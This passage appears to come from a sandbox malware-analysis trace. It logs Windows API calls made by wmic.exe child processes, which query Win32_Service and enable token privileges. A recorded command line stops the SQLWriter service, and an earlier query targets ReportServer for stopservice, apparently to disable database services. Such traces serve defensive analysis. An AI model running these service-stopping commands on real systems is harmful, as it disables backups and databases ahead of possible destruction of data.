returned 0x320ae58 [0280.509] lstrlenA (lpString="") returned 0 [0280.509] malloc (_Size=0x2) returned 0x320b1f8 [0280.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x320b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0280.510] free (_Block=0x320b1f8) [0280.510] malloc (_Size=0x38) returned 0x320bb58 [0280.510] malloc (_Size=0x24) returned 0x320bb98 [0280.510] malloc (_Size=0xc) returned 0x320ae40 [0280.510] free (_Block=0x320ae58) [0280.510] IWbemServices:GetObject (in: This=0x3050e30, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x9cf8a4*=0x0, ppCallResult=0x0 | out: ppObject=0x9cf8a4*=0x3050488, ppCallResult=0x0) returned 0x0 [0280.580] malloc (_Size=0xc) returned 0x320aeb8 [0280.580] IWbemClassObject:GetMethod (in: This=0x3050488, wszName="stopservice", lFlags=0, ppInSignature=0x9cf8c0, ppOutSignature=0x9cf8a0 | out: ppInSignature=0x9cf8c0*=0x0, ppOutSignature=0x9cf8a0*=0x3050680) returned 0x0 [0280.580] free (_Block=0x320aeb8) [0280.580] IUnknown:Release (This=0x3050680) returned 0x0 [0280.580] IUnknown:Release (This=0x3050488) returned 0x0 [0280.582] ??0CHString@@QAE@XZ () returned 0x9cf784 [0280.582] GetCurrentThreadId () returned 0x1114 [0280.582] malloc (_Size=0xc) returned 0x320aeb8 [0280.582] lstrlenA (lpString="") returned 0 [0280.582] malloc (_Size=0x2) returned 0x320b1f8 [0280.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x320b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0280.582] free (_Block=0x320b1f8) [0280.582] malloc (_Size=0xc) returned 0x320ae58 [0280.582] lstrlenA (lpString="") returned 0 [0280.582] malloc (_Size=0x2) returned 0x320b1f8 [0280.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x320b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0280.582] free (_Block=0x320b1f8) [0280.583] malloc (_Size=0xc) returned 0x320ae70 [0280.583] free (_Block=0x320ae58) [0280.583] malloc (_Size=0xc) returned 0x320ae58 [0280.583] lstrlenA (lpString="SELECT * FROM ") returned 14 [0280.583] malloc (_Size=0x1e) returned 0x320bbc8 [0280.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x320bbc8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0280.583] free (_Block=0x320bbc8) [0280.583] malloc (_Size=0xc) returned 0x3209838 [0280.583] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0280.583] SysStringLen (param_1="Win32_Service") returned 0xd [0280.583] free (_Block=0x320ae58) [0280.583] malloc (_Size=0xc) returned 0x320ae58 [0280.583] malloc (_Size=0xc) returned 0x320c098 [0280.583] lstrlenA (lpString=" WHERE ") returned 7 [0280.583] malloc (_Size=0x10) returned 0x320c0b0 [0280.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x320c0b0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0280.583] free (_Block=0x320c0b0) [0280.583] malloc (_Size=0xc) returned 0x320c080 [0280.584] SysStringLen (param_1=" WHERE ") returned 0x7 [0280.584] SysStringLen (param_1="name like '%%ReportServer%%'") returned 0x1c [0280.584] malloc (_Size=0xc) returned 0x320c0b0 [0280.584] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0280.584] SysStringLen (param_1=" WHERE name like '%%ReportServer%%'") returned 0x23 [0280.584] free (_Block=0x3209838) [0280.584] free (_Block=0x320c080) [0280.584] free (_Block=0x320c098) [0280.584] free (_Block=0x320ae58) [0280.584] malloc (_Size=0xc) returned 0x320c0c8 [0280.584] IWbemServices:ExecQuery (in: This=0x3050e30, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'", lFlags=48, pCtx=0x0, ppEnum=0x9cf790 | out: ppEnum=0x9cf790*=0x30541c0) returned 0x0 [0280.614] free (_Block=0x320c0c8) [0280.614] CoSetProxyBlanket (pProxy=0x30541c0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0280.646] IEnumWbemClassObject:Next (in: This=0x30541c0, lTimeout=-1, uCount=0x1, apObjects=0x9cf78c, puReturned=0x9cf77c | out: apObjects=0x9cf78c*=0x0, puReturned=0x9cf77c*=0x0) returned 0x1 [0282.310] IUnknown:Release (This=0x30541c0) returned 0x0 [0282.315] free (_Block=0x320c0b0) [0282.315] free (_Block=0x320ae70) [0282.315] free (_Block=0x320aeb8) [0282.315] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0282.315] free (_Block=0x320ae40) [0282.315] free (_Block=0x320bb28) [0282.315] free (_Block=0x320bae8) [0282.315] free (_Block=0x320baa8) [0282.315] free (_Block=0x320ba78) [0282.315] free (_Block=0x320ba48) [0282.315] free (_Block=0x320bb98) [0282.315] free (_Block=0x320bb58) [0282.315] free (_Block=0x320ba08) [0282.315] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0282.315] GetCurrentThreadId () returned 0x1114 [0282.315] ??0CHString@@QAE@PBG@Z () returned 0x9cf944 [0282.316] ??YCHString@@QAEABV0@PBG@Z () returned 0x9cf944 [0282.316] malloc (_Size=0x800) returned 0x320c110 [0282.316] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x320c110, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0282.316] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0282.316] malloc (_Size=0x1c) returned 0x320ba08 [0282.317] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x320ba08, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0282.317] __iob_func () returned 0x776f2608 [0282.317] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0282.318] __iob_func () returned 0x776f2608 [0282.318] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0282.319] free (_Block=0x320ba08) [0282.319] free (_Block=0x320c110) [0282.319] ??1CHString@@QAE@XZ () returned 0x1 [0282.319] WbemLocator:IUnknown:Release (This=0x3050e30) returned 0x0 [0282.320] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0282.320] _kbhit () returned 0x0 [0282.355] free (_Block=0x320b1e8) [0282.355] free (_Block=0x320abe8) [0282.355] free (_Block=0x320adb0) [0282.355] free (_Block=0x320abb8) [0282.356] free (_Block=0x320ad80) [0282.356] free (_Block=0x320b058) [0282.356] free (_Block=0x320b1c0) [0282.356] free (_Block=0x3209da8) [0282.356] free (_Block=0x320b250) [0282.356] free (_Block=0x320ab10) [0282.356] free (_Block=0x3202be8) [0282.356] free (_Block=0x3200508) [0282.356] free (_Block=0x320bcd8) [0282.356] free (_Block=0x320ac00) [0282.356] free (_Block=0x320aea0) [0282.356] free (_Block=0x320bc98) [0282.356] free (_Block=0x320bc58) [0282.356] free (_Block=0x320ae28) [0282.356] free (_Block=0x320ae10) [0282.356] free (_Block=0x320ae88) [0282.356] free (_Block=0x320bc28) [0282.356] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0282.356] free (_Block=0x320b0f8) [0282.356] free (_Block=0x320adc8) [0282.356] free (_Block=0x320b198) [0282.356] free (_Block=0x320ab28) [0282.357] free (_Block=0x320b208) [0282.357] free (_Block=0x320ac48) [0282.357] free (_Block=0x3202ae8) [0282.357] free (_Block=0x32026b0) [0282.357] free (_Block=0x32026f8) [0282.357] free (_Block=0x3202740) [0282.357] free (_Block=0x320aed0) [0282.357] free (_Block=0x32027d8) [0282.357] free (_Block=0x32004f0) [0282.357] free (_Block=0x3202d48) [0282.357] free (_Block=0x32004d8) [0282.357] free (_Block=0x3202ca8) [0282.357] free (_Block=0x32004a0) [0282.357] free (_Block=0x32004b8) [0282.357] free (_Block=0x3202918) [0282.357] free (_Block=0x3202930) [0282.357] free (_Block=0x32028e0) [0282.357] free (_Block=0x32028f8) [0282.357] free (_Block=0x3202950) [0282.357] free (_Block=0x3202968) [0282.358] free (_Block=0x3202988) [0282.358] free (_Block=0x32029a0) [0282.358] free (_Block=0x3202870) [0282.358] free (_Block=0x3202888) [0282.358] free (_Block=0x3202838) [0282.358] free (_Block=0x3202850) [0282.358] free (_Block=0x32028a8) [0282.358] free (_Block=0x32028c0) [0282.358] free (_Block=0x3202800) [0282.358] free (_Block=0x3202818) [0282.358] free (_Block=0x32027b0) [0282.358] free (_Block=0x3202788) [0282.358] free (_Block=0x320afd0) [0282.358] WbemLocator:IUnknown:Release (This=0x2ff4980) returned 0x2 [0282.358] WbemLocator:IUnknown:Release (This=0x2ffaa68) returned 0x0 [0282.359] WbemLocator:IUnknown:Release (This=0x2ff4980) returned 0x1 [0282.359] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0282.359] WbemLocator:IUnknown:Release (This=0x2ff4980) returned 0x0 [0282.359] free (_Block=0x320aba0) [0282.360] free (_Block=0x320ad08) [0282.360] free (_Block=0x3202d08) [0282.360] free (_Block=0x320ad50) [0282.360] free (_Block=0x320ab70) [0282.360] free (_Block=0x3202c88) [0282.360] free (_Block=0x320ac30) [0282.360] free (_Block=0x320ac60) [0282.360] free (_Block=0x3202c28) [0282.360] free (_Block=0x320abd0) [0282.360] free (_Block=0x320ad20) [0282.360] free (_Block=0x3202c48) [0282.360] free (_Block=0x320ab58) [0282.360] free (_Block=0x320ac90) [0282.360] free (_Block=0x3202d88) [0282.360] free (_Block=0x320acc0) [0282.360] free (_Block=0x320ab40) [0282.360] free (_Block=0x3202c08) [0282.360] free (_Block=0x320ad38) [0282.360] free (_Block=0x320ade0) [0282.361] free (_Block=0x3202ba8) [0282.361] free (_Block=0x320ab88) [0282.361] free (_Block=0x320ad68) [0282.361] free (_Block=0x3202ce8) [0282.361] free (_Block=0x3209868) [0282.361] free (_Block=0x320ac18) [0282.361] free (_Block=0x3202b28) [0282.361] free (_Block=0x320ac78) [0282.361] free (_Block=0x320aca8) [0282.361] free (_Block=0x3202a48) [0282.361] free (_Block=0x320ad98) [0282.361] free (_Block=0x320acd8) [0282.361] free (_Block=0x3202b88) [0282.361] free (_Block=0x320acf0) [0282.361] free (_Block=0x320adf8) [0282.361] free (_Block=0x3202aa8) [0282.361] free (_Block=0x3209988) [0282.361] free (_Block=0x32098e0) [0282.361] free (_Block=0x3202d28) [0282.361] free (_Block=0x3209958) [0282.361] free (_Block=0x32098b0) [0282.361] free (_Block=0x3202da8) [0282.361] free (_Block=0x3209808) [0282.362] free (_Block=0x3209820) [0282.362] free (_Block=0x3202cc8) [0282.362] free (_Block=0x32099a0) [0282.362] free (_Block=0x3209970) [0282.362] free (_Block=0x32029e8) [0282.362] free (_Block=0x32099b8) [0282.362] free (_Block=0x32098f8) [0282.362] free (_Block=0x3202b68) [0282.362] free (_Block=0x3209928) [0282.362] free (_Block=0x3209850) [0282.362] free (_Block=0x3202b48) [0282.362] free (_Block=0x3209898) [0282.362] free (_Block=0x3209940) [0282.362] free (_Block=0x3202d68) [0282.362] free (_Block=0x32098c8) [0282.362] free (_Block=0x32097f0) [0282.362] free (_Block=0x3202a08) [0282.362] free (_Block=0x3209880) [0282.362] free (_Block=0x3209910) [0282.362] free (_Block=0x3202a28) [0282.363] CoUninitialize () [0282.408] exit (_Code=0) [0282.409] free (_Block=0x320aee8) [0282.409] free (_Block=0x3201010) [0282.409] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0282.409] free (_Block=0x3200550) [0282.409] free (_Block=0x32027f0) [0282.409] free (_Block=0x3200ff0) [0282.409] free (_Block=0x3200fd0) [0282.409] free (_Block=0x3200fa0) [0282.409] free (_Block=0x3200f80) [0282.409] free (_Block=0x3200f50) [0282.409] free (_Block=0x3200f10) [0282.409] free (_Block=0x3200ef0) [0282.409] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0282.409] free (_Block=0x3202ac8) Thread: id = 239 os_tid = 0x1128 Thread: id = 240 os_tid = 0x1078 Thread: id = 241 os_tid = 0x1118 Thread: id = 242 os_tid = 0x1134 Process: id = "19" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x5de38000" os_pid = "0x900" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 245 os_tid = 0x10e4 [0282.784] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0282.784] __set_app_type (_Type=0x1) [0282.784] __p__fmode () returned 0x776f3c14 [0282.784] __p__commode () returned 0x776f49ec [0282.785] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0282.785] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0282.786] ??0CHString@@QAE@XZ () returned 0xa685ec [0282.786] malloc (_Size=0x18) returned 0x2b30ee8 [0282.786] malloc (_Size=0x38) returned 0x2b30f08 [0282.786] malloc (_Size=0x28) returned 0x2b30f48 [0282.786] malloc (_Size=0x18) returned 0x2b30f78 [0282.786] malloc (_Size=0x24) returned 0x2b30f98 [0282.787] malloc (_Size=0x18) returned 0x2b30fc8 [0282.787] malloc (_Size=0x18) returned 0x2b30fe8 [0282.787] ??0CHString@@QAE@XZ () returned 0xa688fc [0282.787] malloc (_Size=0x18) returned 0x2b31008 [0282.787] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0282.787] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0282.787] _onexit (_Func=0xa5f370) returned 0xa5f370 [0282.787] _onexit (_Func=0xa5f380) returned 0xa5f380 [0282.787] _onexit (_Func=0xa5f390) returned 0xa5f390 [0282.788] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0282.788] ResolveDelayLoadedAPI () returned 0x74a22590 [0282.788] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0282.794] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0282.808] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x2db4838) returned 0x0 [0282.839] GetCurrentProcess () returned 0xffffffff [0282.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x89f630 | out: TokenHandle=0x89f630*=0x194) returned 1 [0282.839] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x89f62c | out: TokenInformation=0x0, ReturnLength=0x89f62c) returned 0 [0282.839] malloc (_Size=0x118) returned 0x2b326b0 [0282.839] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x2b326b0, TokenInformationLength=0x118, ReturnLength=0x89f62c | out: TokenInformation=0x2b326b0, ReturnLength=0x89f62c) returned 1 [0282.839] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x2b326b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0282.840] free (_Block=0x2b326b0) [0282.840] CloseHandle (hObject=0x194) returned 1 [0282.840] malloc (_Size=0x40) returned 0x2b326b0 [0282.840] malloc (_Size=0x40) returned 0x2b326f8 [0282.840] malloc (_Size=0x40) returned 0x2b32740 [0282.840] SetThreadUILanguage (LangId=0x0) returned 0x650409 [0282.845] _vsnwprintf (in: _Buffer=0x2b32740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x89f5b8 | out: _Buffer="ms_409") returned 6 [0282.845] malloc (_Size=0x20) returned 0x2b31200 [0282.845] GetComputerNameW (in: lpBuffer=0x2b31200, nSize=0x89f61c | out: lpBuffer="NQDPDE", nSize=0x89f61c) returned 1 [0282.845] lstrlenW (lpString="NQDPDE") returned 6 [0282.845] malloc (_Size=0xe) returned 0x2b32788 [0282.845] lstrlenW (lpString="NQDPDE") returned 6 [0282.845] ResolveDelayLoadedAPI () returned 0x7444db00 [0282.845] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x89f630 | out: lpNameBuffer=0x0, nSize=0x89f630) returned 0x658000 [0282.848] GetLastError () returned 0xea [0282.848] malloc (_Size=0x1e) returned 0x2b327a0 [0282.848] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b327a0, nSize=0x89f630 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x89f630) returned 0x1 [0282.848] lstrlenW (lpString="") returned 0 [0282.848] lstrlenW (lpString="NQDPDE") returned 6 [0282.848] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0282.851] lstrlenW (lpString=".") returned 1 [0282.851] lstrlenW (lpString="NQDPDE") returned 6 [0282.851] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0282.851] lstrlenW (lpString="LOCALHOST") returned 9 [0282.851] lstrlenW (lpString="NQDPDE") returned 6 [0282.851] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0282.851] lstrlenW (lpString="NQDPDE") returned 6 [0282.851] lstrlenW (lpString="NQDPDE") returned 6 [0282.851] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0282.852] free (_Block=0x2b32788) [0282.852] lstrlenW (lpString="NQDPDE") returned 6 [0282.852] malloc (_Size=0xe) returned 0x2b32788 [0282.852] lstrlenW (lpString="NQDPDE") returned 6 [0282.852] lstrlenW (lpString="NQDPDE") returned 6 [0282.852] malloc (_Size=0xe) returned 0x2b327c8 [0282.852] lstrlenW (lpString="NQDPDE") returned 6 [0282.852] malloc (_Size=0x4) returned 0x2b327e0 [0282.852] malloc (_Size=0xc) returned 0x2b327f0 [0282.852] ResolveDelayLoadedAPI () returned 0x7745b870 [0282.864] malloc (_Size=0x18) returned 0x2b32808 [0282.864] malloc (_Size=0xc) returned 0x2b32828 [0282.864] SysStringLen (param_1="IDENTIFY") returned 0x8 [0282.864] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0282.864] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0282.864] SysStringLen (param_1="IDENTIFY") returned 0x8 [0282.864] malloc (_Size=0x18) returned 0x2b32840 [0282.864] malloc (_Size=0xc) returned 0x2b32860 [0282.864] SysStringLen (param_1="IMPERSONATE") returned 0xb [0282.864] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0282.864] SysStringLen (param_1="IMPERSONATE") returned 0xb [0282.864] SysStringLen (param_1="IDENTIFY") returned 0x8 [0282.864] SysStringLen (param_1="IDENTIFY") returned 0x8 [0282.864] SysStringLen (param_1="IMPERSONATE") returned 0xb [0282.864] malloc (_Size=0x18) returned 0x2b32878 [0282.864] malloc (_Size=0xc) returned 0x2b32898 [0282.864] SysStringLen (param_1="DELEGATE") returned 0x8 [0282.864] SysStringLen (param_1="IDENTIFY") returned 0x8 [0282.865] SysStringLen (param_1="DELEGATE") returned 0x8 [0282.865] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0282.865] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0282.865] SysStringLen (param_1="DELEGATE") returned 0x8 [0282.865] malloc (_Size=0x18) returned 0x2b328b0 [0282.865] malloc (_Size=0xc) returned 0x2b328d0 [0282.865] malloc (_Size=0x18) returned 0x2b328e8 [0282.865] malloc (_Size=0xc) returned 0x2b32908 [0282.865] SysStringLen (param_1="NONE") returned 0x4 [0282.865] SysStringLen (param_1="DEFAULT") returned 0x7 [0282.865] SysStringLen (param_1="DEFAULT") returned 0x7 [0282.865] SysStringLen (param_1="NONE") returned 0x4 [0282.865] malloc (_Size=0x18) returned 0x2b32920 [0282.865] malloc (_Size=0xc) returned 0x2b32940 [0282.865] SysStringLen (param_1="CONNECT") returned 0x7 [0282.865] SysStringLen (param_1="DEFAULT") returned 0x7 [0282.865] malloc (_Size=0x18) returned 0x2b32958 [0282.865] malloc (_Size=0xc) returned 0x2b304a0 [0282.866] SysStringLen (param_1="CALL") returned 0x4 [0282.866] SysStringLen (param_1="DEFAULT") returned 0x7 [0282.866] SysStringLen (param_1="CALL") returned 0x4 [0282.866] SysStringLen (param_1="CONNECT") returned 0x7 [0282.866] malloc (_Size=0x18) returned 0x2b304b8 [0282.866] malloc (_Size=0xc) returned 0x2b304d8 [0282.866] SysStringLen (param_1="PKT") returned 0x3 [0282.866] SysStringLen (param_1="DEFAULT") returned 0x7 [0282.866] SysStringLen (param_1="PKT") returned 0x3 [0282.866] SysStringLen (param_1="NONE") returned 0x4 [0282.866] SysStringLen (param_1="NONE") returned 0x4 [0282.866] SysStringLen (param_1="PKT") returned 0x3 [0282.866] malloc (_Size=0x18) returned 0x2b329a0 [0282.866] malloc (_Size=0xc) returned 0x2b304f0 [0282.866] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0282.866] SysStringLen (param_1="DEFAULT") returned 0x7 [0282.866] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0282.867] SysStringLen (param_1="NONE") returned 0x4 [0282.867] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0282.867] SysStringLen (param_1="PKT") returned 0x3 [0282.867] SysStringLen (param_1="PKT") returned 0x3 [0282.867] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0282.867] malloc (_Size=0x18) returned 0x2b32ce0 [0282.867] malloc (_Size=0xc) returned 0x2b30508 [0282.867] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0282.867] SysStringLen (param_1="DEFAULT") returned 0x7 [0282.867] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0282.867] SysStringLen (param_1="PKT") returned 0x3 [0282.867] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0282.867] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0282.867] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0282.867] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0282.867] malloc (_Size=0x18) returned 0x2b32d00 [0282.867] malloc (_Size=0x40) returned 0x2b30520 [0282.867] malloc (_Size=0x20a) returned 0x2b397c8 [0282.867] GetSystemDirectoryW (in: lpBuffer=0x2b397c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0282.867] free (_Block=0x2b397c8) [0282.867] malloc (_Size=0xc) returned 0x2b30568 [0282.867] malloc (_Size=0xc) returned 0x2b30580 [0282.867] malloc (_Size=0xc) returned 0x2b32d80 [0282.868] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0282.868] SysStringLen (param_1="\\wbem\\") returned 0x6 [0282.868] free (_Block=0x2b30568) [0282.868] free (_Block=0x2b30580) [0282.868] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0282.868] free (_Block=0x2b32d80) [0282.868] malloc (_Size=0xc) returned 0x2b39940 [0282.868] malloc (_Size=0xc) returned 0x2b39898 [0282.868] malloc (_Size=0xc) returned 0x2b398e0 [0282.868] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0282.868] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0282.868] free (_Block=0x2b39940) [0282.868] free (_Block=0x2b39898) [0282.868] GetCurrentThreadId () returned 0x10e4 [0282.869] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x89f140 | out: phkResult=0x89f140*=0x1a0) returned 0x0 [0282.869] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x89f14c, lpcbData=0x89f148*=0x400 | out: lpType=0x0, lpData=0x89f14c*=0x30, lpcbData=0x89f148*=0x4) returned 0x0 [0282.869] _wcsicmp (_String1="0", _String2="1") returned -1 [0282.869] _wcsicmp (_String1="0", _String2="2") returned -2 [0282.869] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x89f148*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x89f148*=0x42) returned 0x0 [0282.869] malloc (_Size=0x86) returned 0x2b32d80 [0282.869] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2b32d80, lpcbData=0x89f148*=0x42 | out: lpType=0x0, lpData=0x2b32d80*=0x25, lpcbData=0x89f148*=0x42) returned 0x0 [0282.869] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0282.869] malloc (_Size=0x42) returned 0x2b32e10 [0282.869] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0282.869] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x89f14c, lpcbData=0x89f148*=0x400 | out: lpType=0x0, lpData=0x89f14c*=0x36, lpcbData=0x89f148*=0xc) returned 0x0 [0282.869] _wtol (_String="65536") returned 65536 [0282.869] free (_Block=0x2b32d80) [0282.869] RegCloseKey 